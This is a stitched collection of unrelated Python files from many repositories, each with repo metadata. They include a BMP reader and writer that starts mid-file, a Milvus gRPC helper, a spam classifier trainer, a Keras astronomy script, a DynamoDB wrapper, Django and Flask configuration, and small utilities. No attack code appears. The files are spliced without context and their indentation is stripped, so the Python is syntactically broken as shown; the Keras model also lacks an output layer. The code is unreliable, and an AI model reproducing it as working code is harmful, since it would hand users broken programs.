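# offset o yield 0x04030201 = 67305985.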
def read2bint(f, o):
ret = f[o+1]
ret *= 256
ret += f[o]
return ret
def loadBMP(filename):
f = open(filename, 'b+r')
bts = f.read()
f.close()
if (bts[0:2] != b'BM'):
return "Not a supported bitmap file"
bitmapfilesize = read4bint(bts, 0x2)
pixelarrayoffset = read4bint(bts, 0xa)
dibheadersize = read4bint(bts, 0xe)
bitmapwidth = read4bint(bts, 0x12)
bitmapheight = read4bint(bts, 0x16)
bitsperpixel = read2bint(bts, 0x1c)
rawdatasize = read4bint(bts, 0x22)
rowsize = ((bitsperpixel * bitmapwidth + 31) // 32) * 4
ret = []
for j in range(bitmapheight):
row = []
for i in range(bitmapwidth):
x = pixelarrayoffset + i * 3 + j * rowsize
row.append((bts[x + 2], bts[x + 1], bts[x]))
ret.append(row)
return bitmapwidth, bitmapheight, ret[::-1]
def intTo4byte(a):
ret = b''
ret += bytes([a % 256])
a //= 256
ret += bytes([a % 256])
a //= 256
ret += bytes([a % 256])
a //= 256
ret += bytes([a % 256])
return ret
def saveBMP(filename, w, h, pixels):
rowsize = ((24 * w + 31) // 32) * 4
bts = b'BM'
dibheader = b'\x28' + b'\x00' * 3
dibheader += intTo4byte(w)
dibheader += intTo4byte(h)
dibheader += b'\x01\x00\x18' + b'\x00' * 5
dibheader += intTo4byte(h * rowsize)
dibheader += intTo4byte(2835)
dibheader += intTo4byte(2835)
dibheader += intTo4byte(0)
dibheader += intTo4byte(0)
padding = rowsize - 3 * w
pixelarray = []
for a in range(h):
for b in pixels[h - a - 1]:
pixelarray.extend(b)
pixelarray.extend( [0 for i in range(padding)])
pixelarray = bytes(pixelarray)
bmpsize = len(pixelarray) + len(dibheader) + 14
bts += intTo4byte(bmpsize)
bts += intTo4byte(0)
bts += intTo4byte(54)
f = open(filename, 'b+w')
f.write(bts + dibheader + pixelarray)
f.close()
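
# Round-trip usage sketch (added example; the file names are hypothetical):
if __name__ == '__main__':
    width, height, pixels = loadBMP('input.bmp')
    saveBMP('copy.bmp', width, height, pixels)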
| 2,111 |
.workloads/duco-miner-xhash1/src/gendnpfnkey.py
|
lolenseu/Projects
| 5 |
2023400
|
import json
import random
#from xh1.json
xh1 = json.loads(open('src/xh1.json', 'r').read())
#src gen for data, fingerprint, and key
gen_data = '<KEY>'
gen_fp = '0123456789'
gen_key = '123456789'
#data, fingerprint, and key
gen_data_len = '00000000'
gen_fp_len = '00000000'
gen_key_len = '00000000'
#generating raw data, fingerprint, and key
def gendata():
gendata = ''.join(random.choice(gen_data) for i in range(len(gen_data_len)))
return gendata
def genfp():
genfp = ''.join(random.choice(gen_fp) for i in range(len(gen_fp_len)))
return genfp
class steaching():
def __init__(self):
self.banner = ''.join('-' for i in range(len(gen_fp_len)))
self.rawdata = ''.join(f'{gendata()}\n' for i in range(len(gen_data_len)))
self.rawfp = ''.join(f'|{genfp()}|\n' for i in range(len(gen_fp_len)))
self.rawkey = ''.join(random.choice(gen_key) for i in range(len(gen_key_len)))
steach = steaching()
rawdnfpnkey = f'data:\n{steach.rawdata}fingerprint:\n0{steach.banner}0\n{steach.rawfp}0{steach.banner}0\nkey:\n[{steach.rawkey}]\nkeylen: {len(gen_key_len)}'
#print(rawdnfpnkey) ##raw of data, fingerprint, and key
#generating xh1 data, fingerprint, and key
def gen_encode():
global xh1_ram
xh1_file = open('src/xhash.xh1', 'w')
xh1_file.write('0x')
xh1_ram = '0x'
countdata = len(rawdnfpnkey)
counter = 0
while counter < countdata:
procces = rawdnfpnkey[counter]
strap = xh1[procces]
xh1_file.write(strap)
xh1_ram = xh1_ram + strap
counter += 1
| 1,573 |
milvus/client/prepare.py
|
yamasite/pymilvus
| 0 |
2023029
|
import copy
import ujson
from ..grpc_gen import milvus_pb2 as grpc_types
from ..grpc_gen import status_pb2
class Prepare:
@classmethod
def table_name(cls, table_name):
return grpc_types.TableName(table_name=table_name)
@classmethod
def table_schema(cls, table_name, dimension, index_file_size, metric_type, param):
"""
:type param: dict
:param param: (Required)
`example param={'table_name': 'name',
'dimension': 16,
'index_file_size': 1024
'metric_type': MetricType.L2
}`
:return: ttypes.TableSchema object
"""
_param = grpc_types.TableSchema(status=status_pb2.Status(error_code=0, reason='Client'),
table_name=table_name,
dimension=dimension,
index_file_size=index_file_size,
metric_type=metric_type)
if param:
param_str = ujson.dumps(param)
_param.extra_params.add(key="params", value=param_str)
return _param
@classmethod
def insert_param(cls, table_name, vectors, partition_tag, ids=None, params=None, **kwargs):
if ids is None:
_param = grpc_types.InsertParam(table_name=table_name, partition_tag=partition_tag)
else:
_param = grpc_types.InsertParam(
table_name=table_name,
row_id_array=ids,
partition_tag=partition_tag)
for vector in vectors:
if isinstance(vector, bytes):
_param.row_record_array.add(binary_data=vector)
else:
_param.row_record_array.add(float_data=vector)
params = params or dict()
params_str = ujson.dumps(params)
_param.extra_params.add(key="params", value=params_str)
return _param
@classmethod
def index_param(cls, table_name, index_type, params):
_param = grpc_types.IndexParam(status=status_pb2.Status(error_code=0, reason='Client'),
table_name=table_name,
index_type=index_type)
params = params or dict()
params_str = ujson.dumps(params)
_param.extra_params.add(key="params", value=params_str)
return _param
@classmethod
def search_param(cls, table_name, topk, query_records, partitions, params):
search_param = grpc_types.SearchParam(
table_name=table_name,
topk=topk,
partition_tag_array=partitions
)
for vector in query_records:
if isinstance(vector, bytes):
search_param.query_record_array.add(binary_data=vector)
else:
search_param.query_record_array.add(float_data=vector)
params = params or dict()
params_str = ujson.dumps(params)
search_param.extra_params.add(key="params", value=params_str)
return search_param
@classmethod
def search_by_id_param(cls, table_name, top_k, id_, partition_tag_array, params):
_param = grpc_types.SearchByIDParam(
table_name=table_name, id=id_, topk=top_k,
partition_tag_array=partition_tag_array
)
params = params or dict()
params_str = ujson.dumps(params)
_param.extra_params.add(key="params", value=params_str)
return _param
@classmethod
def search_vector_in_files_param(cls, table_name, query_records, topk, ids, params):
_search_param = Prepare.search_param(table_name, topk, query_records,
partitions=[], params=params)
return grpc_types.SearchInFilesParam(
file_id_array=ids,
search_param=_search_param
)
@classmethod
def cmd(cls, cmd):
return grpc_types.Command(cmd=cmd)
@classmethod
def delete_param(cls, table_name, start_date, end_date):
range_ = Prepare.range(start_date, end_date)
return grpc_types.DeleteByDateParam(range=range_, table_name=table_name)
@classmethod
def partition_param(cls, table_name, tag):
return grpc_types.PartitionParam(table_name=table_name, tag=tag)
@classmethod
def delete_by_id_param(cls, table_name, id_array):
return grpc_types.DeleteByIDParam(table_name=table_name, id_array=id_array)
@classmethod
def flush_param(cls, table_names):
return grpc_types.FlushParam(table_name_array=table_names)
@classmethod
def compact_param(cls, table_name):
return grpc_types.TableName(table_name=table_name)
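
# Usage sketch (added example; the table name and parameter values are
# illustrative, not taken from the original module):
#
#   search = Prepare.search_param(
#       table_name="demo_table", topk=5,
#       query_records=[[0.1, 0.2, 0.3, 0.4]],
#       partitions=[], params={"nprobe": 16},
#   )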
| 4,802 |
src/api/__init__.py
|
ThaDeveloper/grind
| 1 |
2022896
|
from django.apps import AppConfig
class ApiAppConfig(AppConfig):
name = 'api'
label = 'api'
verbose_name = 'Api'
def ready(self):
import api.signals
# Django checks for the `default_app_config` property of each registered app
# and uses the correct app config based on that value.
default_app_config = 'api.ApiAppConfig'
| 347 |
src/main/PyCodes/spamClassification.py
|
panditu2015/Sentiment-Analysis
| 0 |
2023349
|
import re
import csv
import pprint
import nltk.classify
import pickle
import pandas as pd
from nltk.classify.scikitlearn import SklearnClassifier
from sklearn.linear_model import LogisticRegression,SGDClassifier
from sklearn.naive_bayes import MultinomialNB,BernoulliNB
from sklearn.svm import SVC, LinearSVC, NuSVC
#start replaceTwoOrMore
def replaceTwoOrMore(s):
#look for 2 or more repetitions of character
pattern = re.compile(r"(.)\1{1,}", re.DOTALL)
return pattern.sub(r"\1\1", s)
#end
#start process_tweet
def processTweet(tweet):
# process the tweets
#Convert to lower case
tweet = tweet.lower()
#Convert www.* or https?://* to URL
tweet = re.sub('((www\.[^\s]+)|(https?://[^\s]+))','URL',tweet)
#Convert @username to AT_USER
tweet = re.sub('@[^\s]+','AT_USER',tweet)
#Remove additional white spaces
tweet = re.sub('[\s]+', ' ', tweet)
#Replace #word with word
tweet = re.sub(r'#([^\s]+)', r'\1', tweet)
#trim
tweet = tweet.strip('\'"')
return tweet
#end
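# Added example (illustrative tweet, not from the original script):
# processTweet("Loving the new #Python release!!! https://example.com @dev")
# returns "loving the new python release!!! URL AT_USER".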
#start getStopWordList
def getStopWordList(stopWordListFileName):
#read the stopwords
stopWords = []
stopWords.append('AT_USER')
stopWords.append('URL')
fp = open(stopWordListFileName, 'r')
line = fp.readline()
while line:
word = line.strip()
stopWords.append(word)
line = fp.readline()
fp.close()
return stopWords
#end
#start getfeatureVector
def getFeatureVector(tweet, stopWords):
featureVector = []
words = tweet.split()
for w in words:
#replace two or more with two occurrences
w = replaceTwoOrMore(w)
#strip punctuation
w = w.strip('\'"?,.')
#check if it consists of only words
val = re.search(r"^[a-zA-Z][a-zA-Z0-9]*[a-zA-Z]+[a-zA-Z0-9]*$", w)
#ignore if it is a stopWord
if(w in stopWords or val is None):
continue
else:
featureVector.append(w.lower())
return featureVector
#end
#start extract_features
def extract_features(tweet):
tweet_words = set(tweet)
features = {}
for word in featureList:
features['contains(%s)' % word] = (word in tweet_words)
return features
#end
dircetory = "C:\\Users\\User\\Sentiment-Analysis\\src\\main\\"
#Read the tweets one by one and process it
inpTweets = csv.reader(open(dircetory + 'Resources\\sms_spam_train.csv', 'r', encoding = "cp850"))
# inpTweets = pd.read_csv("data/full_training_dataset.csv", encoding="")
print(inpTweets)
stopWords = getStopWordList(dircetory + 'Resources\\stopwords.txt')
count = 0
featureList = []
tweets = []
for row in inpTweets:
# print(row)
sentiment = row[0]
tweet = row[1]
processedTweet = processTweet(tweet)
featureVector = getFeatureVector(processedTweet, stopWords)
featureList.extend(featureVector)
tweets.append((featureVector, sentiment))
#end loop
# Remove featureList duplicates
featureList = list(set(featureList))
# print("featureList", featureList)
# Generate the training set
training_set = nltk.classify.util.apply_features(extract_features, tweets)
# print("training set", training_set)
print("Train the Naive Bayes classifier")
NBClassifier = nltk.NaiveBayesClassifier.train(training_set)
print("Trained NaiveBayes_Classifier")
filename = 'NaiveBayes_Classifier.sav'
pickle.dump(NBClassifier, open(dircetory + "Output\\Models\\Spam\\" + filename, 'wb'))
print("Training SVC_classifier")
SVC_classifier = SklearnClassifier(SVC())
SVC_classifier.train(training_set)
print("Trained SVC_classifier")
filename1 = 'SVC_classifier.sav'
pickle.dump(SVC_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename1, 'wb'))
# print("Train the Max Entropy classifier")
# MaxEntClassifier = nltk.classify.maxent.MaxentClassifier.train(training_set, 'GIS', trace=3, \
# encoding=None, labels=None, gaussian_prior_sigma=0, max_iter = 10)
# print("ME trained")
# filename2 = 'Max_Entropy_new.sav'
# pickle.dump(MaxEntClassifier, open(dircetory + "Output\\Models\\" + filename2, 'wb'))
print("Training Logisitic Regression")
LogisticRegression_classifier = SklearnClassifier(LogisticRegression())
LogisticRegression_classifier.train(training_set)
print("Trained Logisitic Regression")
filename3 = 'LogisticRegression_classifier.sav'
pickle.dump(LogisticRegression_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename3, 'wb'))
print("Training MNB_classifier")
MNB_classifier = SklearnClassifier(MultinomialNB())
MNB_classifier.train(training_set)
print("Trained MNB_classifier")
filename4 = 'MNB_classifier.sav'
pickle.dump(MNB_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename4, 'wb'))
print("Training SGDClassifier_classifier")
SGDClassifier_classifier = SklearnClassifier(SGDClassifier())
SGDClassifier_classifier.train(training_set)
print("Trained SGDClassifier_classifier")
filename5 = 'SGDClassifier_classifier.sav'
pickle.dump(SGDClassifier_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename5, 'wb'))
print("Training LinearSVC_classifier")
LinearSVC_classifier = SklearnClassifier(LinearSVC())
LinearSVC_classifier.train(training_set)
print("Trained LinearSVC_classifier")
filename6 = 'LinearSVC_classifier.sav'
pickle.dump(LinearSVC_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename6, 'wb'))
print("Training BernoulliNB_classifier")
BernoulliNB_classifier = SklearnClassifier(BernoulliNB())
BernoulliNB_classifier.train(training_set)
print("Trained BernoulliNB_classifier")
filename7 = 'BernoulliNB_classifier.sav'
pickle.dump(BernoulliNB_classifier, open(dircetory + "Output\\Models\\Spam\\" + filename7, 'wb'))
| 5,686 |
aws_lambda_powertools/utilities/feature_flags/exceptions.py
|
nayaverdier/aws-lambda-powertools-python
| 1,208 |
2023364
|
class ConfigurationStoreError(Exception):
"""When a configuration store raises an exception on config retrieval or parsing"""
class SchemaValidationError(Exception):
"""When feature flag schema fails validation"""
class StoreClientError(Exception):
"""When a store raises an exception that should be propagated to the client to fix
For example, Access Denied errors when the client doesn't permissions to fetch config
"""
| 447 |
AstroMl/RRLyrae/Astro_Convolutional.py
|
vais-ral/CCPi-ML
| 0 |
2023326
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 24 10:12:03 2018
@author: zyv57124
"""
import matplotlib
matplotlib.use("Agg")
import numpy as np
import pandas
import sys
import matplotlib.pyplot as plt
import scipy.io as sio
import tensorflow as tf
import sklearn
from tensorflow import keras
from sklearn.model_selection import train_test_split
import math
from keras.models import Sequential
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.layers.core import Activation
from keras.layers.core import Flatten
from keras.layers.core import Dense
from keras import backend as K
from keras.layers.normalization import BatchNormalization
from keras.layers.core import Dropout
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
from keras.preprocessing.image import img_to_array
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
import numpy as np
import argparse
import random
import pickle
from time import time
class TimingCallback(keras.callbacks.Callback):
def __init__(self):
self.logs=[]
def on_epoch_begin(self, epoch, logs={}):
self.starttime=time()
def on_epoch_end(self, epoch, logs={}):
self.logs.append(time()-self.starttime)
#############Data Loading & Conversion######################
def predictionMap(xlim,ylim):
mesh = []
for x in np.arange(xlim[0],xlim[1],0.001):
for y in np.arange(ylim[0],ylim[1],0.001):
mesh.append([x,y])
return (np.array(mesh))
def reBalanceData(x,y):
filter1 = y==1
ones = x[np.where(y==1)].copy()
y_ones = y[np.where(y==1)].copy()
total = len(y)
total_one = len(ones)
multiplier = math.ceil(total/total_one)
for i in range(multiplier):
x = np.insert(x,1,ones,axis=0)
y = np.insert(y,1,y_ones,axis=0)
ran = np.arange(x.shape[0])
np.random.shuffle(ran)
x= x[ran]
y= y[ran]
return x,y
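# Added note (not in the original script): reBalanceData oversamples the
# positive (RR Lyrae) class by re-inserting its rows multiplier times until the
# two classes are roughly balanced, then shuffles the combined arrays.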
BS = 1000 #Set batch size
EPOCHS = 100 #Set epochs
INIT_LR = 0.003 #Set learning rate
IMAGE_DIMS = (20,20,1) #set image dimensions
num_classes = 1
Data_Astro = np.loadtxt('Data\AstroML_Data.txt',dtype=float)
Labels_Astro = np.loadtxt('Data\AstroML_Labels.txt',dtype=float)
Data_Astro = Data_Astro[:, [1, 0]]
print(Data_Astro.shape)
X_train, X_test,y_train, y_test = train_test_split(Data_Astro, Labels_Astro,test_size=0.2, shuffle=True)
print('X_train shape:', X_train.shape)
print(X_train.shape[0], 'train samples')
print(X_test.shape[0], 'test samples')
N_tot=len(y_train)
N_st = np.sum(Labels_Astro == 0)
N_rr = N_tot - N_st
N_plot = 5000 +N_rr
#Plot original data
fig = plt.figure(figsize=(5, 2.5))
fig.subplots_adjust(bottom=0.15, top=0.95, hspace=0.0, left=0.1, right=0.95, wspace=0.2)
ax = fig.add_subplot(1, 1, 1)
im=ax.scatter(Data_Astro[-N_plot:, 1], Data_Astro[-N_plot:, 0], c=Labels_Astro[-N_plot:], s=4, lw=0, cmap=plt.cm.binary, zorder=2)
im.set_clim(-0.5, 1)
plt.show()
N_tot=len(y_train)
N_st = np.sum(Labels_Astro == 0)
N_rr = N_tot - N_st
# partition the data into training and testing splits using 80% of
# the data for training and the remaining 20% for testing
#Weighting
filter1=y_train==0
y_train[filter1] = 0
filter1=y_train==1
y_train[filter1] = 1
X_train,y_train = reBalanceData(Data_Astro,Labels_Astro)
img_x, img_y = 20, 20
input_shapes = (20,20, 1)
# convert the data to the right type
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
#Build model
class_weight = {0:1.,1:((N_tot/N_rr)*1.2)}
class SmallerVGGNet:
def build(width, height, depth, classes):
model = Sequential()
model.add(Conv2D(32, (2, 2), padding="same", input_shape=input_shapes))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=1))
model.add(MaxPooling2D(pool_size=(3, 3)))
model.add(Dropout(0.25))
return model
model = SmallerVGGNet.build(width=IMAGE_DIMS[1], height=IMAGE_DIMS[0],depth=IMAGE_DIMS[2], classes='2')
model.compile(loss="binary_crossentropy", optimizer='adam', metrics=["accuracy"])
#
cb=TimingCallback()
history = model.fit(X_train, y_train, batch_size=BS,validation_data=(X_test, y_test),epochs=EPOCHS, verbose=1)
K.get_session().graph
## save the model to disk
#print("[INFO] serializing network...")
#model.save(args["model"])
#
## plot the training loss and accuracy
#plt.style.use("ggplot")
#plt.figure()
#N = EPOCHS
#plt.plot(np.arange(0, N), H.history["loss"], label="train_loss")
#plt.plot(np.arange(0, N), H.history["val_loss"], label="val_loss")
#plt.plot(np.arange(0, N), H.history["acc"], label="train_acc")
#plt.plot(np.arange(0, N), H.history["val_acc"], label="val_acc")
#plt.title("Training Loss and Accuracy")
#plt.xlabel("Epoch #")
#plt.ylabel("Loss/Accuracy")
#plt.legend(loc="upper left")
#plt.savefig(args["plot"])
#
#loss_data = (history.history['loss'])
#
#a = np.transpose(model.predict(X_test))
#
#
#xlim = (0.7, 1.35)
#ylim = (-0.15, 0.4)
#
#mesh = predictionMap(xlim,ylim) #makes mesh array
#xshape = int((xlim[1]-xlim[0])*1000)+1
#yshape = int((ylim[1]-ylim[0])*1000)
#predictions = model.predict(mesh[:,[1,0]]) #classifies points in the mesh 1 or 0
##%%
#fig = plt.figure(figsize=(5, 2.5))
#fig.subplots_adjust(bottom=0.15, top=0.95, hspace=0.0, left=0.1, right=0.95, wspace=0.2)
#ax = fig.add_subplot(1, 1, 1)
#im=ax.scatter(X_test[:, 1], X_test[:, 0], c=a[0], s=4, lw=0, cmap=plt.cm.binary, zorder=2)
#im.set_clim(-0.5, 1)
#ax.contour(np.reshape(mesh[:,0], (xshape, yshape)), np.reshape(mesh[:,1],(xshape,yshape)), np.reshape(predictions,(xshape,yshape)), cmap=plt.cm.binary,lw=2)
#plt.show()
| 5,739 |
nicaviz/python_utils.py
|
nicapotato/nicaviz
| 0 |
2023539
|
from contextlib import contextmanager
import time
@contextmanager
def timer(name):
"""
Time Each Process
"""
t0 = time.time()
yield
print('[{}] done in {} s'.format(name, round(time.time() - t0, 0)))
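
# Minimal usage sketch (added example):
if __name__ == "__main__":
    with timer("square a million ints"):
        _ = [i * i for i in range(1_000_000)]
    # prints something like: [square a million ints] done in 0.0 s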
| 226 |
telehelp/__init__.py
|
Eliorco/TeleHelp
| 0 |
2023547
|
# url api
# https://api.telegram.org/bot<token>/METHOD_NAME
from flask import Flask
from telehelp.configuration import FLASK_SECRET_KEY, db_connection_string
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config.from_object(__name__)
app.secret_key = FLASK_SECRET_KEY
app.config['SQLALCHEMY_DATABASE_URI'] = f'sqlite:///{db_connection_string}'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
from telehelp import routes
| 467 |
imports.py
|
John-N-Carter/Viewer
| 1 |
2022799
|
#! python3
import sys, os, binascii
import random as r, math as m, copy as C
#
import glob, string, math, time, getopt, shutil, configparser
import subprocess as sub
#
import wx
import wx.lib.buttons as buttons
import imghdr
import constants as CONST
from operator import itemgetter, attrgetter
from concurrent import futures
if __name__ == '__main__':
print('Imports for Viewer')
| 412 |
smmap/scripts/correlation_strength_factor_tests.py
|
UM-ARM-Lab/mab_ms
| 3 |
2022729
|
#!/usr/bin/python
from run_trial import *
for correlation_strength_factor in [0.01, 0.1, 0.5, 0.9, 0.99]:
run_trial(
experiment="cloth_table",
start_bullet_viewer='true',
screenshots_enabled='true',
logging_enabled='true',
test_id='correlation_strength_factor_trials/KFMANDB_factor_' + str(correlation_strength_factor),
optimization_enabled='true',
bandit_algorithm='KFMANDB',
multi_model='true',
calculate_regret='true',
use_random_seed='false',
correlation_strength_factor=correlation_strength_factor)
for correlation_strength_factor in [0.01, 0.1, 0.5, 0.9, 0.99]:
run_trial(
experiment="rope_cylinder",
start_bullet_viewer='true',
screenshots_enabled='true',
logging_enabled='true',
test_id='correlation_strength_factor_trials/KFMANDB_factor_' + str(correlation_strength_factor),
optimization_enabled='true',
bandit_algorithm='KFMANDB',
multi_model='true',
calculate_regret='true',
use_random_seed='false',
correlation_strength_factor=correlation_strength_factor)
for correlation_strength_factor in [0.01, 0.1, 0.5, 0.9, 0.99]:
run_trial(
experiment="cloth_wafr",
start_bullet_viewer='true',
screenshots_enabled='true',
logging_enabled='true',
test_id='correlation_strength_factor_trials/KFMANDB_factor_' + str(correlation_strength_factor),
optimization_enabled='true',
bandit_algorithm='KFMANDB',
multi_model='true',
calculate_regret='true',
use_random_seed='false',
correlation_strength_factor=correlation_strength_factor)
| 1,709 |
examples/ctf_demo.py
|
enthought/ensemble
| 4 |
2023644
|
"""
This demonstrates the `CtfEditor` widget.
To use: right-click in the window to bring up a context menu. Once you've added
a color or opacity, you can drag them around by just clicking on them. The
colors at the end points are editable, but cannot be removed.
"""
from os.path import join
from traits.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
from enaml.qt.qt_application import QtApplication
from ensemble.ctf.api import CtfEditor, CtfManager, get_color
import traits_enaml
if __name__ == "__main__":
with traits_enaml.imports():
from ctf_demo_window import CtfDemoWindow
app = QtApplication()
ctf_editor = CtfEditor(prompt_color_selection=get_color)
ctf_manager = CtfManager.from_directory(
join(ETSConfig.application_data, 'CTF_demo')
)
win = CtfDemoWindow(ctf_editor=ctf_editor, ctf_manager=ctf_manager)
win.show()
app.start()
| 907 |
shop/migrations/0013_auto_20200827_1013.py
|
RitvikDayal/The-Stone-Shop
| 2 |
2023629
|
# Generated by Django 3.0.8 on 2020-08-27 04:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0012_auto_20200826_1307'),
]
operations = [
migrations.AddField(
model_name='customer',
name='email',
field=models.EmailField(default='<EMAIL>', max_length=100),
),
migrations.AddField(
model_name='customer',
name='fname',
field=models.CharField(default='Jhon', max_length=100),
),
migrations.AddField(
model_name='customer',
name='lname',
field=models.CharField(default='Doe', max_length=100),
),
]
| 740 |
command/randomcaptains.py
|
SodaCookie/RoleBot
| 1 |
2023758
|
import random
import helpers
async def randomcaptains(message, context):
"""Pick two random people from a specific voice channel to be captains."""
if not message.author.voice or not message.author.voice.channel:
helpers.send_message("You need to be part of a voice channel to use this command.")
return
channel = context.client.get_channel(message.author.voice.channel.id)
if len(channel.members) < 2:
helpers.send_message("This channel needs at least 2 people in it to pick captains.")
return
captains = random.sample(channel.members, 2)
helpers.send_message(message.channel, "Team 1's Captain: %s\nTeam 2's Captain: %s" % (helpers.get_member_name(captains[0]), helpers.get_member_name(captains[1])))
| 761 |
src/dymdao/dymdao.py
|
umaxyon/dymdao
| 0 |
2023283
|
import boto3
import inspect
class DymDao:
def __init__(self, *args, **kwargs):
self.db = boto3.resource('dynamodb', *args, **kwargs)
self.client = boto3.client('dynamodb', *args, **kwargs)
def table(self, table_name):
return WrapTable(self, table_name)
class WrapTable:
def __init__(self, dao, table_name):
self.dao = dao
self.table_name = table_name
self.table = self.dao.db.Table(table_name)
self.ddl = self.dao.client.describe_table(TableName=table_name)
self.key = self.__get_key_name()
self.__register_method()
def __register_method(self):
methods = inspect.getmembers(self.table, inspect.ismethod)
for name, func in methods:
setattr(self, name, self.__intercept(func))
def __get_key_name(self):
key_schema = self.ddl['Table']['KeySchema']
hash_name = next((r['AttributeName'] for r in key_schema if r['KeyType'] == "HASH"), None)
range_name = next((r['AttributeName'] for r in key_schema if r['KeyType'] == "RANGE"), None)
return hash_name, range_name
@staticmethod
def __intercept(method):
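        # Wrap a boto3 Table method so that its raw DynamoDB response is passed
        # through pick_out_item and only the Item/Items payload is returned.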
def _m(*args, **kwargs):
ret = method(*args, **kwargs)
return WrapTable.pick_out_item(ret)
return _m
@staticmethod
def pick_out_item(obj):
if type(obj) == dict:
if 'Item' in obj:
return obj['Item']
if 'Items' in obj:
items = []
for row in obj['Items']:
items.append(row['Item'] if type(row) == dict and 'Item' in row else row)
return items
return obj
def find(self, hash_value, range_value=None, asc=True, option=None):
hash_name, range_name = self.key
opt = option if option is not None else {}
if range_value is not None:
key_param = {hash_name: hash_value, range_name: range_value}
ret = self.table.get_item(Key=key_param, **opt)
ret = self.pick_out_item(ret)
return [ret] if ret is not None else []
else:
query_params = {
"TableName": self.table_name,
"KeyConditionExpression": "#a = :val",
"ExpressionAttributeValues": {":val": hash_value},
"ExpressionAttributeNames": {"#a": hash_name},
"ScanIndexForward": asc,
}
query_params.update(opt)
ret = self.table.query(**query_params)
return self.pick_out_item(ret)
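# Minimal usage sketch (illustrative only -- the table name "users" and its key
# layout are assumptions, not part of this module; boto3 credentials and region
# come from the usual AWS configuration):
#
#   dao = DymDao()
#   users = dao.table("users")             # wraps boto3 Table + describe_table
#   users.put_item(Item={"user_id": "u1", "name": "Alice"})
#   rows = users.find("u1")                # query/get_item unwrapped to plain items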
| 2,584 |
tools/jisx0208.py
|
tatnish/SDFont
| 0 |
2023486
|
#!/usr/bin/env python3
# coding: utf-8
#
# This script outputs set of characters used by font_to_py.py
# Usage:
# python3 jisx0208.py > chars.txt
# python3 font_to_py.py -k chars.txt <input ttf font name> <output.py>
#
# Go visit: https://github.com/tatnish/micropython-font-to-py
# for more detail converter info.
#
# Note: JIS0208.TXT is available at:
# http://unicode.org/Public/MAPPINGS/OBSOLETE/EASTASIA/JIS/JIS0208.TXT
jisx0208=[]
unicode=[]
with open("JIS0208.TXT", "r") as f:
for line in f:
if (not line[0] == "#"):
_, jis, uni, __ = line.strip().split("\t")
jisx0208.append(int(jis,16))
unicode.append(int(uni,16))
# ASCII
for i in range(0x20,0x7F):
print(chr(i),end="")
# Half-width kana
for i in range(0xFF61,0xFF9D):
print(chr(i),end="")
# JIS X 0208
for i in jisx0208:
print(chr(unicode[jisx0208.index(i)]), end="")
| 897 |
autotabular/pipeline/components/data_preprocessing/categorical_encoding/one_hot_encoding.py
|
jianzhnie/AutoTabular
| 48 |
2022629
|
from typing import Dict, Optional, Tuple, Union
import numpy as np
import scipy.sparse
from autotabular.pipeline.base import DATASET_PROPERTIES_TYPE, PIPELINE_DATA_DTYPE
from autotabular.pipeline.components.base import AutotabularPreprocessingAlgorithm
from autotabular.pipeline.constants import DENSE, INPUT, SPARSE, UNSIGNED_DATA
from autotabular.pipeline.implementations.SparseOneHotEncoder import SparseOneHotEncoder
from ConfigSpace.configuration_space import ConfigurationSpace
from sklearn.preprocessing import OneHotEncoder as DenseOneHotEncoder
class OneHotEncoder(AutotabularPreprocessingAlgorithm):
def __init__(self, random_state: Optional[np.random.RandomState] = None):
self.random_state = random_state
def fit(self,
X: PIPELINE_DATA_DTYPE,
y: Optional[PIPELINE_DATA_DTYPE] = None) -> 'OneHotEncoder':
if scipy.sparse.issparse(X):
self.preprocessor = SparseOneHotEncoder()
else:
self.preprocessor = DenseOneHotEncoder(
sparse=False, categories='auto', handle_unknown='ignore')
self.preprocessor.fit(X, y)
return self
def transform(self, X: PIPELINE_DATA_DTYPE) -> PIPELINE_DATA_DTYPE:
if self.preprocessor is None:
raise NotImplementedError()
return self.preprocessor.transform(X)
@staticmethod
def get_properties(
dataset_properties: Optional[DATASET_PROPERTIES_TYPE] = None
) -> Dict[str, Optional[Union[str, int, bool, Tuple]]]:
return {
'shortname': '1Hot',
'name': 'One Hot Encoder',
'handles_regression': True,
'handles_classification': True,
'handles_multiclass': True,
'handles_multilabel': True,
'handles_multioutput': True,
            # TODO find out if this is right!
'handles_sparse': True,
'handles_dense': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (INPUT, ),
}
@staticmethod
def get_hyperparameter_search_space(
dataset_properties: Optional[DATASET_PROPERTIES_TYPE] = None
) -> ConfigurationSpace:
return ConfigurationSpace()
| 2,218 |
src/dbcontroller/manager/utils/object_id.py
|
hlop3z/dbcontroller
| 0 |
2022734
|
"""
* Database Specific (Decode)
"""
try:
from bson.objectid import ObjectId
except ImportError:
ObjectId = None
from .ids import ID
def sql_id_decode(unique_id) -> int | None:
"""Decoder for SQL"""
try:
return_value = int(ID.decode(unique_id))
except Exception:
return_value = None
return return_value
def mongo_id_decode(unique_id) -> str | None:
"""Decoder for Mongo"""
try:
return_value = ObjectId(ID.decode(unique_id))
except Exception:
return_value = None
return return_value
| 564 |
telesurvideos/settings_es.py
|
dreglad/telesurvideos
| 0 |
2022697
|
# -*- coding: utf-8 -*- #
"""
telesurvideos Spanish site settings
"""
from __future__ import unicode_literals
from settings import *
SITE_ID = 1
LANGUAGE_CODE = 'es'
LANGUAGES = (
('es', gettext('es')),
)
CACHES['default']['KEY_PREFIX'] = 'es'
CELERY_BROKER_URL = 'redis://localhost:6379/0'
VIDEOS_EXCLUDE_CATEGORIAS = (
'con-nombre-de-mujer', 'zona-verde', 'al-pulso-de-venezuela',
'al-pulso-de-ecuador', 'a-nivel-del-sur',
)
VIDEOS_EXCLUDE_TIPOS = ('tematico',)
